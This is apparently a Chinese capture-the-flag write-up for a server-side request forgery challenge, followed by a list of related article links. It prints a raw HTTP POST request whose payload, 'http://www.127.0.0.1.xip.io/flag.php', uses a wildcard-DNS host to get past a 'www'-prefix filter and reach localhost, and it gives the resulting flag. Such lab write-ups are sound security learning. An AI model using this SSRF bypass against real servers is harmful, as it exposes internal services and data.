【CTF WEB】服务端请求伪造
Web 请求 服务端 CTF 伪造
2023-09-14 08:57:09 时间
服务端请求伪造
如你所愿,这次可以读取所有的图片,但是域名必须是www开头
测试方法
POST /index.php HTTP/1.1
Host: 218.2.197.236:27375
Content-Length: 40
Cache-Control: max-age=0
Origin: http://218.2.197.236:27375
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://218.2.197.236:27375/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
img=http://www.127.0.0.1.xip.io/flag.php
得到key的base64,解码就拿到key了。
flag{flag{bee0a4e12cebea3de29025a13a9174c8}}
相关文章
- Go Web -- 模板引擎
- [Web 安全] WASC 和 OWASP两个web安全方面组织机构介绍
- [Web 前端] 如何在React中做Ajax 请求?
- 【CTF WEB】ISCC 2016 web 2题记录
- java web 判断请求是手机端还是PC端(代码库)
- java web跨域请求
- Web 前端从入门菜鸟到实践老司机所需要的资料与指南合集
- Web应用漏洞发现概述
- ASP.NET Core应用针对静态文件请求的处理[1]: 以Web的形式发布静态文件
- Self Host模式下的ASP. NET Web API是如何进行请求的监听与处理的?
- Atitit web 之道 艾龙著 Atitit web 之道 艾龙艾提拉著v2 saa.docx Atitit web开发之道 attilax著 Web应用 1. 第1章 Web编程基础知识 (
- Atitit.web三大编程模型 Web Page Web Forms 和 MVC
- ASP.NET Web Forms - Validation 服务器控件
- Caused by: java.lang.IllegalStateException: 由于StackOverflower错误,无法完成对web应用程序[/lib]的批注的扫描。可能的根本原因包......
- 007-优化web请求三-异步调用【WebAsyncTask】
- web小流量实验方案
- Web测试中,各类web控件测试点总结
- 【Web测试】各类web控件测试点汇总,软测人必备
- WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等
- go语言web开发系列之四:gin框架用viper读取配置文件数据
- Java Web项目实战之HTTP请求分析